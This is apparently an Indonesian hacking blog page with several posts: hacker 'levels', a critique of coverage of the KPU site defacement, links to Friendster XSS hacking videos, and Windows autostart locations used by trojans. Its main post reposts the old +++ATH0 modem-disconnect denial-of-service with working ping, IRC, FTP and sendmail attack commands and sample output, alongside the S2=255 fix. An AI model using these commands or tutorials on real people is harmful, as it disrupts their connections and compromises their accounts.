Friendster,Hacking,Cracking,Carding

Friendster,Hacking,Cracking,Carding

Masukan Nama Penyanyi - Judul Lagu

Mesin Cari Free Download Mp3 Gratis
Masukan Nama Penyanyi - Judul Lagu

Mesin Cari Free Download Mp3 Gratis

Mengenal Lebih Jauh tentang Hacker

Written by ferry89 on 19.58

Mengenal Lebih Jauh ttg Hacker

Dalam dunia kita (hacker) terdapat tingkat/level. Seorang hacker akan
melalui tahapan tahapan untuk menjadi sempurna. Tahapan tersebut ialah:

1. Mundane Person
Tingkatan paling bawah. Seseorang pada tingkatan ini pada dasarnya tidak
tahu sama sekali tentang hacker dan cara-caranya, walaupun ia mungkin
memiliki komputer sendiri dan akses Internet. Ia hanya tahu bahwa yang
namanya hacker itu membobol sistem komputer dan melakukan hal-hal yang
negatif (tindak kejahatan). Padahal sebenarnya hacker bukan seperti itu,
kecuali hacker tidak taat e-tik

2. Lamer
Seseorang pada tingkatan ini masih dibingungkan oleh seluk beluk hacking
karena ia berpikir bahwa melakukan hacking sama seperti cara-cara waras
(dalam dunia underground berarti menggandakan perangkat lunak secara ilegal).
Pengetahuannya tentang hal-hal seperti itu masih minim, tapi sudah mencoba belajar.
Seseorang pada tingkatan ini sudah bisa mengirimkan trojan (yang dibuat orang lain)
ke atau pada komputer orang lain ketika melakukan obrolan pada IRC atau ICQ dan
menghapus file-file mereka. Padahal ia sendiri tidak tahu persis bagaimana trojan bekerja.
Seseorang yang sukses menjadi hacker biasanya bisa melalui tahapan ini dengan cepat bahkan melompatinya.

3. Wannabe
Pada tingkatan ini seseorang sudah mengetahui bahwa melakukan tindakan hack itu lebih dari
sekedar menerobos masuk ke komputer orang lain. Ia lebih menganggap hal tersebut sebagai sebuah filsafat
atau way of life. Akhirnya ia jadi ingin tahu lebih banyak lagi. Ia mulai mencari,
membaca dan mempelajari tentang metode-metode hacking dari berbagai sumber.

4. Newbie
Pada tingkatan ini ia sudah memiliki dasar-dasar teknik hacking.
Ia akan mencoba menerobos masuk ke sistem orang lain hanya untuk mencoba apa yang sudah ia pelajari.
Meskipun demikian, pada tingkatan ini ia mengerti bahwa ketika melakukan hacking ia tidak harus merusak sistem
atau menghapus apa saja jika hal itu tidak diperlukan untuk menutupi jejaknya.

5. Hacker
Sebenarnya sulit untuk mengatakan tingkatan akhir atau final dari hacker telah tercapai,
karena selalu saja ada sesuatu yang baru untuk dipelajari atau ditemukan
(mengumpulkan informasi dan mempelajarinya dengan cermat merupakan dasar-dasar yang sama bagi seorang hacker)
dan hal tersebut juga tergantung perasaan (feeling). Meskipun demikian, menjadi seorang hacker memang lebih menjurus
pada hal pemikiran.

Hacker yang tidak taat pada etik akan menjadi:

Dark-side Hacker
Seorang Dark-side hacker sama seperti Darth Vader (tokoh dalam film Star Wars) yang tertarik dengan kekuatan kegelapan.
Hal ini tidak ada hubungannya dengan masalah “baik” atau “jahat” tapi lebih kepada masalah “sah (sesuai hukum yang berlaku)” dan “kekacauan”.
Seorang Dark-side hacker punya kemampuan yang sama dengan semua hacker, tapi “sisi gelap” dari pikirannya membuat ia menjadi unsur berbahaya.

Selengkapnya.....

Mengejar "Hacker" Itu Mudah

Written by ferry89 on 19.13


Tanggapan Atas Tulisan di Media Kompas 'Mengejar "Hacker" Itu Mudah'


Jasakom - Terus terang membaca artikel diatas yang ditulis oleh Affan Basalamah, membuat saya "terpaksa" ikutan berkomentar atas kasus ini.

Media : Kompas, 10 Mei 2004
Judul : Mengejar "Hacker" Itu Mudah
Halaman : 39

Berikut ini beberapa tanggapan yang sempat saya catat setelah membaca tulisan tersebut. Jika saya baca secara detail tulisan tersebut ada beberapa kejanggalan disana.

Kejanggalan yang sempat saya catat antara lain :

1. Log yang tercatat pada firewall ataupun web server KPU hanyalah IP dari Thailand, karena ketika Dani melakukan serangan dia mempergunakan proxy anonymous Thailand.

2. Kalaupun Tim IT KPU, berhasil mengidentifikasi sang penyerang, maka yang akan tercatat adalah IP Proxy Anonymous Thailand, bukanlah IP Dani (PT. Danareksa).

3. Jika memang Tim IT KPU berhasil kontak dengan pengelola proxy anonymous Thailand, maka Tim IT KPU harus memegang log proxy yang mengakses situs KPU pada saat terjadinya serangan. Karena di dalam log inilah akan tercatat IP mana saja yang mempergunakan proxy anonymous untuk mengakses situs KPU. Log inilah yang akan menjadi bukti kuat bahwa Dani memang mempergunakan proxy anonymous tersebut untuk menyerang situs KPU. (Menurut pandangan saya hal ini cukup sulit mengingat biasanya proxy anonymous tidak memiliki log ini. Kalaupun ada rasanya tidaklah mudah untuk mendapatkan log tersebut, karena pengelola proxy anonymous pasti akan merahasiakannya. Oleh karena melibatkan privacy orang lain, oleh sebab itu namanya "proxy anonymous").

4. Darimana Tim IT KPU berhasil memiliki nickname pelaku pembobolan?, karena biar bagaimanapun, jika misalkan ada orang lain yang berhasil menembus sistem keamanan KPU, maka sang cracker dapat menuliskan nickname yang ia mau. Sebagai contoh, misalkan saja saya berhasil menembus keamanan KPU dan bisa mendefaced situs KPU, maka ada kemungkinan saya akan menuliskan "Hacked By Someone", padahal belum tentu orang yang memiliki nick someone melakukannya.

5. Secara teoritis, apa yang ditulis dalam artikel tersebut memang menggambarkan model penangkapan cracker, tapi apakah memang metode itu yang dipergunakan untuk menangkap Dani? terus terang saya ragu. Karena yang saya tangkap dari beberapa tulisan selama ini tertangkapnya Dani adalah hanya karena nickname Dani dan kemudian cybercrime polisi melakukan social engineering di IRC. Jadi proses yang digambarkan dalam artikel tersebut bukanlah metode yang digunakan untuk menangkap Dani. Kecuali memang ada log proxy anonymous yang dipegang oleh Tim IT KPU.

6. Seandainya Dani tidak mengakui bahwa ia berhasil menembus sistem keamanan KPU, lalu darimana tim IT KPU membuktikannya? lha wong selama ini belum pernah ada kabar bahwa tim IT KPU memegang log proxy anonymous (belum lagi masalah keabsahan bukti digital)?

7. Pembobolan situs KPU tidak 100% merupakan kesalahan Dani. Karena Tim IT KPU juga melakukan kesalahan dalam membangun aplikasi/scripting. Analogi rumah yang dimasuki maling seperti yang dituliskan dalam artikel tersebut tidak dapat dijadikan dasar untuk menghukum Dani, karena apa yang terjadi di dunia nyata tidak dapat disamakan dengan di dunia maya. Kalaupun dipaksa menggunakan analogi seperti itu justru menurut saya seharusnya Tim IT KPU juga mendapat hukuman, karena memberikan kesempatan kepada Dani (Seperti kata Bang Napi di RCTI, -kejahatan tidak hanya terjadi karena niat pelakunya, tapi juga karena kesempatan yang ada, maka waspadalah... waspadalah... :-)-)

Beberapa minggu yang lalu saya sempet diskusi dengan S'to (pengelola http://www.jasakom.com) untuk masalah ini di Pasar Festival Jakarta dan ada beberapa hal yang bisa saya tangkap, antara lain :

1. Tertangkapnya Dani tidak disertai bukti yang kuat (karena bukti digital tidak dapat dijadikan acuan, belum lagi -mungkin- tidak adanya log proxy anonymous sebagai bukti terkuat).

2. Proses penangkapan yang dilakukan cybercrime hanyalah mengandalkan nickname Dani dan social engineering di IRC.

3. Pembuktian Dani sebagai pelaku dikarenakan Dani mengakui bahwa ialah pelakunya. Jadi sama sekali bukan hasil kerja KPU. kalaupun Dani menyangkal melakukannya maka nickname Dani tidak dapat dijadikan bukti kuat. Jadi bisa disimpulkan bahwa sebenarnya Dani MENYERAHKAN DIRI bukan DITANGKAP seperti yang selama ini digembar-gemborkan oleh media massa.

4. Keberhasilan Dani men-defaced Situs KPU, membuktikan bahwa tidak ada sebuah sistem yang aman 100%. Ini jelas merupakan pembuktian dari omongan Ketua IT KPU yang mengatakan bahwa sistem mereka aman 100%.

5. Firewall yang dikatakan 6 lapis pun ternyata bisa ditembus hanya karena bug SQL injection yang jelas-jelas merupakan bug lawas. Jelas bahwa kesalahan bukanlah di level sistem operasi ataupun firewallnya tapi berada pada level aplikasi/scripting yang dibangun. Pantaskah aplikasi ini untuk level KPU jika dikembalikan ke dana +/- 200 milyar?

Terlepas dari salah atau tidaknya Dani, saya cuman mengingatkan bahwa ada kemungkinan kasus semacam ini akan timbul dimasa-masa mendatang, untuk itu diperlukan perangkat hukum dan aturan yang jelas. Dan sudah barang tentu penyusunan perangkat hukum tersebut juga melibatkan komunitas underground, sehingga nantinya hukum tersebut bisa mengakomodir berbagai pihak.

Saat ini saya cuman berharap, jika memang Dani harus dihukum maka hukuman yang diberikan nantinya adalah merupakan hukuman yang win-win solution... Semoga..........

Selengkapnya.....

Video Hacking Friendster

Written by ferry89 on 17.14





Hai Guyz.....
Akhirnya.......
hm....hm......Setelah Beberapa hari ini aku udah bela2 ini ntuk ga sekolah..... Finnaly aku menemukan sesuatu yg lumayan berguna juga........
Dalam posting kali ini, aku mencoba untuk membeberkan sedikit...Gimana cara menghacking friendster...Tp, eitz tunggu dulu..... Kali ini postingan nya beda......
Kita menggunakan video....Jadi langsung praktek bro.......
Oceee.........ini bukan sesuatu untuk di praktekan....semata-mata hanya untuk pengetahuan.....

Friendster episode1.rar

FriendsterXSS Episode 2.rar

Selengkapnya.....

Modem Error

Written by ferry89 on 22.15

--------------------------------------------------------------------------------

Aduh koneksi dialup saya disconnect terus
Pernahkan anda ketika sedang asyik-asyik main IRC, dan tiba-tiba modem anda disconnect, dan setiap kali terkoneksi dan join ke channel mengalami modem anda disconnect lagi. Anda mungkin diserang oleh lawan anda dengan menggunakan eksploitasi +++ATH0. Saya rasa hal ini sering dialami oleh warnet-warnet yang menggunakan modem dialup untuk internet sharing, dimana mungkin salah satu kliennya melakukan hal yang tidak sopan pada channel sehingga diserang.

Tulisan ini perlu dibaca oleh setiap orang yang menggunakan modem untuk melakukan koneksi ke internet, dan merupakan keharusan bagi pemilik warnet untuk mengetahuinya.

Tulisan ini tidak ditujukan untuk mengajari anda bagaimana melakukan disconnect modem pemakai di Internet, tetapi memberikan informasi bahwa kemungkinan hal tersebut dapat dilakukan, sehingga anda dapat berhati-hati dan menanggulanginya.



--------------------------------------------------------------------------------

1+2=3, +++ATH0=Old school DoS Attack
Date: Sun, 27 Sep 1998 13:52:33 -0400
Reply-To: wage@IDIRECT.CA
Sender: Bugtraq List
From: "Max Schau (Noc-Wage)"
Organization: M.C.S.R
Subject: 1+2=3, +++ATH0=Old school DoS
To: BUGTRAQ@NETSPACE.ORG

+++ATH0
Dipersiapkan oleh Noc-Wage (Max Schau, M.C.S.R) Dipersembahkan untuk anda oleh orang-orang yang mengagumkan di #hackers undernet dan M.C.S.R

All OS's using a dial-up connection are at risk.

***CATATAN***
Ini adalah suatu eksploitasi yang sudah kuno, tetapi tidak ada cara yang efektif untuk menyelesaikan masalah ini, sehingga perlu diketahui oleh setiap orang atau minimal memberikan perhatian

.
***CATATAN***

Mulanya berasal dari perhatian saya terhadap nak, dan maffew "s2=255 Fix" dan menjadi perhatian saya akan SuiDRoot dan Sygma diantara menit yang satu sama yang lain. (Saya memeriksa manual modem) Juga terima kasih kepada Defraz, DrSmoke dan zerox (swab) untuk memperbolehkaan saya bertukar pikiran dengan mereka dan kontibusi ide untuk proyek tersebut. Terima kasih juga untuk rekan-rekan di #hackers.

Mungkin hal ini akan mengingatkan kepada anda akan masa kejayaan dari BBS di tahun 80-an dan 90-an. ;)

Kebanyakan modem dewasa ini menggunakan Hayes Command set (ATZ, ATDT, ATH0..) Kelemahan dari modem-modem ini cara menangani string-string tertentu sehingga menyebabkan mereka terbuka bagi serangan sejenis DoS. Yaitu dengan membuatnya melakukan respon terhadap string "+++ATH0", pada umumnya modem (dari berbagai merek) akan menggangap +++ATH0 sebagai usaha dari pemakai untuk memasuki modus perintah (command mode) secara manual dan menjalankan perintah tertentu. Ketika modem korban mencoba melakukan respon terhadap +++ATH0 (sesaat modem menemukannya dalam datagram IP) modem akan otomatis melakukan hung-up.

Bagaimana Eksploitasi ini dilakukan

Dengan perintah ping:

ping -p 2b2b2b415448300d host

Untuk pemakai IRC (pada mirc):

/raw NOTICE ToastyMan $+ $chr(1) $+ PING +++ATH0 $+ $chr(1)

Nampaknya juga dapat bekerja melalui bnc atau proxy.

**Tidak bekerja pada semua modem **

Beberapa modem, seperti U.S. Robotics, modem jenis 33.6 yang membutuhkan suatu hentian kira-kira satu detik dimana tidak ada text yang dikirim sebelum dan sesudah +++ untuk memasuki modus perintah. Sehingga hal tersebut tidak menyebabkan modem untuk melakukan hang up, karena tidak ada cara untuk membuat mesin korban melakukan jawaban terhadap +++ tanpa diikuti data seketika (tidak ada cara untuk membuat suatu selang waktu antara +++ dengan ATH0). Hal ini terjadi karena Frame pada PPP selalu diikuti data setelah IP datagram.

Suatu contoh serangan yang mungkin dilakukan adalah sebagai berikut : (IP address dapat diubah sesuai kebutuhan)

[wage@koroshiya /]$ telnet 192.168.1.1 21 Trying 192.168.1.1...
Connected to 192.168.1.1.
Escape character is '^]'.
220 foo FTP server (Version wu-2.4.2-academ[BETA-15](1) Fri Dec 12 20:41:
USER +++ATH0
^]
telnet> close
Connection closed.

[wage@koroshiya wage]$ telnet 192.168.1.1 21 Trying 192.168.1.1...
telnet: Unable to connect to remote host: Network is unreachable [wage@koroshiya wage]$

Modem yang diketahui memiliki hasil efek:

Logicode 28.8
Supra 33.6 (internal)
Diamond Supra v.90
Banyak lagi yang lain tetapi hanya ini saja yang kami miliki.

Yang telah kita coba sejak xploit ditemukan:
Diamond SupraExpress 56k
Semua Rockwell Chipsets

Semua modem USR yang kami coba tidak berhasil, tetapi merek-merek lain umumnya berhasil.

PPP tidak melakukan kompresi terhadap IP datagram pada defaultnya,

PPP tidak melakukan kompresi terhadap IP datagram pada defaultnya, sehingga ip datagram yang dikandung dalam PPP frame akan persis sama. Atau dengan kata lain jika IP datagram mengandung "+++ATH0" modem juga akan menerima string yang persis sama.

Dua cara untuk membuat agar modem korban untuk mengirim +++ATH0 adalah :

1) Lakukan koneksi ke sendmail (tidak bekerja pada qmail), lakukan "HELO blah.com"
Kemudian ketik "VRFY +++ATH0", normalnya akan dijawab:
550 +++ATH0... User unknown, tetapi karena modem mereka melakukan interpretasi terhadap +++ATH0 maka modem melakukan hang up.

2) Lakukan koneksi ke FTP dan ketik "USER +++ATH0". Normalnya akan direspon:
331 Password required for +++ATH0. Tetapi karena modem menemukan +++ATH0 dan disconnect dilakukan.

Sebagaimana yang anda lihat, hal tersebut sederhana saja, dan ada jutaan cara yang dapat lakukan untuk menghasilkan efek yang sama.

Tentu saja serangan ini menyerupai suatu bom pipa. Kadang-kadang bekerja, dan kadang-kadang tidak, dan kadang-kadang menjadi senjata makan tuan. Jika modem anda juga memiliki efek yang sama terhadap serangan ini, dan anda mencoba menggunakan serangan ini, bisa saja anda sendiri yang akan mengalami disconnect. Ketika anda mengirim +++ATH0, modem anda mengenalinya juga. Ada beberapa cara dengan melakukan serangan dari server atau suatu koneksi ISDN, cable modem...

Untuk melindungi diri anda dari serangan ini, tambahkan pada modem initialization string anda "s2=255" yang mana akan mematikan kemampuan modem untuk memasuki modus perintah. (Hal ini dapat menjadi masalah baru bagi beberapa orang). Dimana s2 mengganti character yang akan digunakan untuk memasuki modus perintah. Pada normalnya adalah suatu nilai diatas 127 yang akan mematikan kemampuan untuk memasuki modus command secara manual, tetapi dalam hal ini tertentu saja membutuhkan suatu nilai yang lebih besar, untuk pastinya gunakan saja 255.

Berikut ini adalah cara yang digunakan MrPhoenix untuk mendapatkan hasil yang sama tanpa perlu koneksi ke suatu daemon maupun IRC Server. Dia menggunakan PING PAKET untuk memaksa korban melakukan respon terhadap string tersebut.

Ini adalah apa yang dia kirim:

+++ATH0 Ping exploit

Ping modem killer by MrPhoenix (phoenix@iname.com).

Ini adalah eksploitasi yang sederhana untuk +++ATH0 bug yang ada di Noc-Wage's post.

Memiliki efek pada: Semua modem yang mana tidak membutuhkan suatu 500msec atau lebih waktu idle setelah perintah +++, koneksi dengan suatu koneksi tanpa encryption/compression.

Beberapa cara untuk hung up telah diperkenalkan oleh Noc-Wage dengan menggunakan sendmail maupun ftp daemon, atau bahkan menggunakan suatu koneksi IRC. Tetapi ada satu cara yang lebih sederhana tanpa membutuhkan suatu daemon yang ada.

Anda dapat mengirim suatu ICMP ECHO_REQUEST ke target untuk mendapatkan suatu ICMP ECHO_RESPONSE, dan mengisi paket tersebut dengan +++ATH0 karakter.

Karakter dapat membantu pada modem tertentu yang mana membutuhkan suatu perintah ATH0 yang diikuti enter. Setelah target menerima ICMP ECHO_REQUEST akan mengirim ICMP ECHO_REPLY kepada anda dengan data yang sama dengan paket ICMP ECHO_REQUEST tersebut. Modem akan membaca +++, dan menuju ke modus perintah, kemudian membaca ATH0, dan menutup koneksi.

Untuk membuat agar hal diatas dapat bekerja, anda dapat membuat program sendiri yang mengirim paket yang diperlukan, atau menggunakan program ping dengan option yang "-p" yang mengagumkan dimana anda dapat mengisinya sampai 16 karakter pada paket yang akan dikirim. Option "-p" membutuhkan pola dimasukkan secara digit hexadesimal. Ekivalen dari '+++ATH0' string hexadesimal adalah : 2b2b2b415448300d .

Perintah lengkapnya adalah : ping -p 2b2b2b415448300d

*CATATAN*: Option "-p" tidak didukung oleh program "ping" dari Microsoft pada MS-Windows.

Berikut ini adalah suatu contoh :

[root@narf ath0]# ping -p 2b2b2b415448300d -c 5 xxx.xxx.xxx.xxx PATTERN: 0x2b2b2b415448300d
PING xxx.xxx.xxx.xxx (xxx.xxx.xxx.xxx): 56 data bytes

--- xxx.xxx.xxx.xxx ping statistics --- 5 packets transmitted, 0 packets received, 100% packet loss [root@narf ath0]#

Adalah suatu yang akan anda dapatkan jika modem memutuskan koneksi. Saya mengirim 5 paket untuk memastikan, karena 1 atau 2 paket mungkin tidak bekerja.

Berikut ini adalah yang anda peroleh jika bug tersebut tidak bekerja:

[root@narf ath0]# ping -p 2b2b2b415448300d -c 5 xxx.xxx.xxx.xxx PATTERN: 0x2b2b2b415448300d
PING xxx.xxx.xxx.xxx (xxx.xxx.xxx.xxx): 56 data bytes 64 bytes from xxx.xxx.xxx.xxx: icmp_seq=0 ttl=252 time=182.4 ms 64 bytes from xxx.xxx.xxx.xxx: icmp_seq=1 ttl=252 time=190.1 ms 64 bytes from xxx.xxx.xxx.xxx: icmp_seq=2 ttl=252 time=190.1 ms 64 bytes from xxx.xxx.xxx.xxx: icmp_seq=3 ttl=252 time=190.1 ms 64 bytes from xxx.xxx.xxx.xxx: icmp_seq=4 ttl=252 time=180.1 ms

--- xxx.xxx.xxx.xxx ping statistics --- 5 packets transmitted, 5 packets received, 0% packet loss round-trip min/avg/max = 180.1/186.5/190.1 ms [root@narf ath0]#

Untuk melindungi diri anda, matikan perintah +++ dengan setting register S2 ke 255 (cara yang paling mudah), atau melakukan patching terhadap kernel anda untuk menjatuhkan (drop) paket masuk yang mengandung string "+++ATH0" (cara yang sulit).

Salam kepada: setiap orang di #grhack, zerox yang mana telah membantu saya untuk menemukan eksploitasi ini, Noc-Wage, nac, maffew dan semua orang lainnya din #hackers all the Greek hackers.


--------------------------------------------------------------------------------

Selengkapnya.....

Aktif Program

Written by ferry89 on 22.12

--------------------------------------------------------------------------------

Dapatkah kita mengaktifkan program di Windows tanpa diketahui pemakainya ?

Tulisan ini ditulis dengan tujuan memberi pengetahuan kepada pemakai komputer, terutama yang menggunakan sistem operasi Windows, akan adanya fasilitas autostart yang pada satu sisi sangat bermanfaat untuk secara otomatis menjalankan aplikasi setiap mengaktifkan komputer. Tetapi fasilitas ini juga banyak digunakan oleh para hacker untuk mengaktifkan program remote yang telah dimasukkan ke komputer tanpa diketahui oleh korban.

Dewasa ini telah beredar berbagai program yang dapat berjalan secara background pada komputer, umumnya program ini digunakan untuk tugas-tugas tertentu yang tidak mengganggu perhatian pemakai, misalnya program Task Scheduler yang akan menjalankan program tertentu berdasarkan jadwal yang dibuat, program Messanger yang akan aktif ketika kita dipanggil oleh rekan melalui internet.

Tetapi banyak juga program background yang digunakan untuk tujuan yang tidak baik, seperti remote akses dimana aktifitas kita dapat dilihat melalui suatu remote software, bahkan dapat mengambil file dari media penyimpan tanpa kita ketahui melalui LAN maupun Internet, bahkan beberapa trojan berjalan di background dan secara mengambil user id dan password pemakai, dan mengirimkannya melalui internet.

Sebagai seorang yang bergerak dibidang IT, saya sering ditanya oleh orang-orang tertentu bagaimana mengetahui apa yang sedang dikerjakan bawahannya, apakah mereka benar-benar sedang mengerjakan pekerjaan kantor atau sedang bermain-main. Jawabnya tentu saja menginstalasi program remote administrator yang berjalan di background, sehingga pemakai tidak akan sadar bahwa aktifitas layarnya sedang diawasi.

Sebagai pemakai komputer yang awam, tentu saja kita perlu mengetahui adanya hal-hal tersebut, terutama dengan makin pentingnya komputer dalam perdagangan dan industri, misalnya Internet Banking, E-Commerce. Pengetahuan akan metode autostart ini akan menjadi nilai tambah bagi anda, terutama pemakai yang memiliki pengetahuan terbatas tentang komputer dan sistem operasi.


--------------------------------------------------------------------------------

Beberapa metode autostart pada Windows
Banyak program Windows memiliki kemampuan untuk mengaktifkan dirinya setiap kali anda mengaktifkan komputer anda. Teknik ini juga digunakan oleh berbagai trojan untuk mengaktifkan dirinya. Adapun metode-metode ini adalah sebagai berikut :

Menjalankan Windows dari autoexec.bat secara win nama_program, dimana nama_program adalah program yang akan diaktifkan.

Mengikutsertakan dirinya dalam file winstart.bat

Menggunakan perintah LOAD= atau RUN= pada file win.ini

Menambah dirinya di shell=explorer.exe nama_program pada file system.ini, ini adalah salah satu metode yang digunakan oleh SubsSeven untuk mengaktifkan dirinya setiap anda start windows.

Menduplikasikan dirinya atau membuat shortcut pada direktori C:\WINDOWS\Start Menu\Programs\StartUp, metode ini digunakan oleh microsoft office untuk mengaktifkan fasilitas findfast, dan office toolbar

Menjalankan dirinya dari salah satu registry key berikut ini :
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion

dengan key :

Run
RunOnce, dimana key harus dibentuk kembali setelah launch
RunOnceEx, dimana key harus dibentuk kembali setelah launch
RunService, dimana key harus dibentuk kembali setelah launch
RunServiceOnce, dimana key harus dibentuk kembali setelah launch
HKEY_CLASSES_ROOT\exefile\shell\open\command
[dari pada "%1" %* . Metode ini sangat sukar dimengerti dan licik]

Memeriksa program-program yang dijalankan pada StartUp komputer anda !!!

Anda dapat memeriksa kondisi berdasarkan point-point diatas dengan menggunakan utility yang tersedia pada windows seperti :

SysEdit.Exe, yang terdapat pada \Windows\System, yang dapat anda jalankan dari Start, Run, kemudian ketik SysEdit.Exe, kemudian klik OK, otomatis akan membuka file Config.sys, Autoexec.bat, System.ini, Win.ini dan Protocol.ini.

MsConfig.Exe, adalah tools visual yang lebih friendly, saya sarankan sebaiknya anda menggunakan tools ini, kemudian pilih tab StartUp, disana anda dapat memilih program-program yang akan dijalankan di pada saat StartUp, dan mana saja yang ingin dibuang.

Beberapa hal yang perlu anda ketahui untuk menjaga perfomance Windows anda !!!

Pada dasarnya, hanya item-item yang berguna yang akan berada pada SystemTray "SysTray.exe", dan driver-driver tambahan yang dibutuhkan agar perangkat keras khusus tertentu dapat bekerja dengan baik, seperti scanner, kamera digital, yang umumnya dijalankan dengan menggunakan HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run.

Jika anda menginstall TweakUI akan terdapat Tweak UI "RUNDLL32.EXE TWEAKUI.CPL,TweakMeUp" pada HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServices.

Hal lain yang mungkin ada jika anda menginstalasi program antivirus (yang mana akan memperlambat sistem anda secara keseluruhan, tetapi benar-benar berguna, karena akan memeriksa keberadaan virus/trojan pada akses disk, maupun file, serta email attachment).

Jangan lupa lakukan pemeriksaan terhadap kemungkinan duplikat terhadap program-program tertentu, kadang-kadang suatu program perlu dijalankan lebih dari satu cara.

Sebenarnya RunOnce key dan sejenisnya digunakan untuk menyelesaikan proses instalasi software dimana perlu mengkonfigurasikan dirinya pada proses boot pertama kali setelah diinstalasi, terutama pada software yang setelah diinstalasi memberikan pesan "This installation requires to restart your system to be completed, you want to reboot now or later?"
Jika sistem anda dalam keadaan bersih, maka ketika anda mengaktifkan task monitor (CTRL+ALT+DEL) sesaat setelah Windows anda diboot, anda seharusnya hanya melihat Explorer, SysTray, dan driver-driver yang dibutuhkan untuk hardware-hardware spesial tertentu.


--------------------------------------------------------------------------------

Selengkapnya.....

Tips Googling

Written by ferry89 on 21.30

Memang tidak aneh jika nama Google dikenal dimana – dimana, karena hampir setiap orang memakai search engine ini untuk tujuan tertentu. Terutama para hacker, hacker mana yang tidak kenal dengan Google ? Hampir setiap hacker sudah sangat akrab dengan Google, karena . . . Google adalah senjata rahasia mereka dalam mencari informasi tentang target – targetnya. Bagaimana hacker bisa melakukannya dengan Google ? Sebentar lagi Anda akan tahu jika Anda mau membaca artikel ini . . .



Penggunaan dasar :

# Google tidak “case sensitive”.
Keyword: YogYaFreE = Yogyafree = yoGyafREe
Akan menghasilkan keyword yang sama

# AND: Secara default Google menggunakan keyword and.
Keyword: menjadi hacker
Hasilnya pencarian akan mengandung kata “menjadi” dan “hacker”

# OR: Digunakan untuk menemukan halaman yang setidaknya berisi salah
satu dari keyword. Note: OR dituliskan dengan huruf besar semua.
Keyword: now OR nothing
Hasilnya pencarian akan mengandung kata “now” atau “nothing”

# +: Google akan mengabaikan pencarian dengan kata-kata umum seperti
“how” dan “where”. Jika kata-kata umum ini begitu penting, anda
bisa menambahkan tanda “+” didepan keyword tersebut.
Keyword: hacker how => Kata “how” akan diabaikan
Keyword: hacker +how => Kata “how” akan diikutsertakan

# -: Tanda minus “-” bisa digunakan untuk mengecualikan kata-kata
tertentu dalam pencarian. Misal kita ingin mencari kata
“linus tanpa linux”, kita bisa menggunakan “linus -linux”

# *: Google tidak mendukung pencarian * sebagai pengganti huruf.
Misalkan kita ingin mencari dengan kata depan sa*
Google tidak mencari kata “sapi”, “sampeu”, “sakti”, dll
Google akan menghasilkan pencarian hanya yang mengandung kata
“sa”.

Tetapi google mendukung penggunaan * dalam pencarian kalimat.
Keyword: “menjadi * hacker”
Hasilnya pencarian dapat menghasilkan “menjadi seorang hacker”,
“menjadi white hacker”, dll.

# “”: Dapat digunakan untuk mencari kata yg lengkap.
Keyword: “menjadi hacker”
Hasilnya pencarian akan mengandung kata “menjadi hacker”

# ?: Dapat digunakan untuk mencari pada direktori Google
Keyword: ?intitle:index.of? mp3

Operator Spesial

- Contoh hasil pencarian -

Google => Judul
… Language Tools. Ways to help with tsunami relief \
Advertising Programs - About Google ©2005 Google => Deskripsi
Searching 8,058,044,651 web pages. /
www.google.com/ - 3k - 5 Jan 2005 => URL

- Contoh hasil pencarian -

# intitle: Untuk mencari kata-kata dari judul suatu halaman web.
Keyword: intitle:Admin Administrasi
Keyword tersebut akan mencari judul halaman “Admin” dengan
deskripsi “Administrasi”

# allintitle: Untuk mencari kata-kata dari judul halaman web
secara lengkap.
Keyword: allintitle:Admin Administrasi
Keyword tersebut akan mencari judul halaman yang mengandung
kata “Admin” dan “Administrasi”

# inurl: Digunakan untuk mencari semua URL yang berisi kata-kata
tertentu.
Keyword: inurl:Admin Administrasi
Keyword tersebut akan mencari URL yang mengandung kata “Admin”
dengan deskripsi “Administrasi”

# allinurl: Digunakan untuk mencari semua URL yang berisi kata-kata
tertentu.
Keyword: allinurl:Admin Administrasi
Keyword tersebut akan mencari URL yang mengandung kata “Admin”
dan “Administrasi”

# site: Untuk mencari dalam suatu situs tertentu saja
Keyword: site:www.yogyafree.net
Semua pencarian hanya berdasarkan site “www.yogyafree.net”

# cache: Ketika Googlebot mengindeks suatu situs, google akan
mengambil snapshot dari semua halaman yang telah terindeks.
Operator ini membantu melihat halaman-halaman yang telah
dicache.
Keyword: cache:www.yogyafree.net
Misalkan site aslinya sudah tidak aktif, anda tetap dapat melihatnya
pada snapshot/cache yang disimpan oleh Google.

# define: Operator ini digunakan untuk mencari definisi dari frasa
tertentu. Semua kata yang diketik setelah operator ini akan
diperlakukan sebagai satu frasa.
Keyword: define:hacker

# filetype: Jika kita mencari jenis file tertentu yang berisi informasi
yang anda inginkan kita bisa menggunakan operator ini.
Keyword: “hacker” filetype:pdf
Sampai tulisan ini dibuat google support tipe file
# Adobe Portable Document Format (pdf)
# Adobe PostScript (ps)
# Lotus 1-2-3 (wk1, wk2, wk3, wk4, wk5, wki, wks, wku)
# Lotus WordPro (lwp)
# MacWrite (mw)
# Microsoft Excel (xls)
# Microsoft PowerPoint (ppt)
# Microsoft Word (doc)
# Microsoft Works (wks, wps, wdb)
# Microsoft Write (wri)
# Rich Text Format (rtf)
# Shockwave Flash (swf)
# Text (ans, txt)
Ref: http://www.google.com/help/faq_filetypes.html

# link: Untuk mencari tahu berapa banyak link ke suatu situs, kita bisa
menggunakan operator link.
Keyword: link:www.google.com

# related: Untuk mencari halaman yang isinya mirip dengan URL tertentu.
Keyword: related:www.google.com

Memanipulasi URL Google

#> And bisa mengganti interface google dengan mengganti variabel hl
(default google hl=en => bahasa inggris)
Misalkan kita mengubah interface-nya menjadi bahasa Indonesia.
Ex:
http://www.google.com/search?hl=en&lr=&q=site%3Aboleh-hacking.com&btnG=Search
Hasil modifikasi URL
http://www.google.com/search?hl=id&lr=&q=site%3Aboleh-hacking.com&btnG=Search

#> Anda dapat mengganti hasil pencarian hanya pada bahasa tertentu. Hal ini
dilakukan dengan modifikasi variabel lr.
(default google lr=lang_en => bahasa inggris)
Misalkan kita hasil pencarian hanya bahasa Indonesia.
Ex:
http://www.google.com/search?hl=en&lr=&q=site%3Aboleh-hacking.com&btnG=Search
Hasil modifikasi URL
http://www.google.com/search?hl=en&lr=lang_id&q=site%3Aboleh-hacking.com&btnG=Search

#> Secara default google akan menampilkan 10 site perhalaman. Anda dapat
mengubahnya secara langsung melalui URL-nya, dengan menambahkan variabel
num pada URL.
Penggunaan num antara 1-100
Ex:
http://www.google.com/search?hl=en&lr=&q=site%3Aboleh-hacking.com&btnG=Search
Hasil modifikasi URL
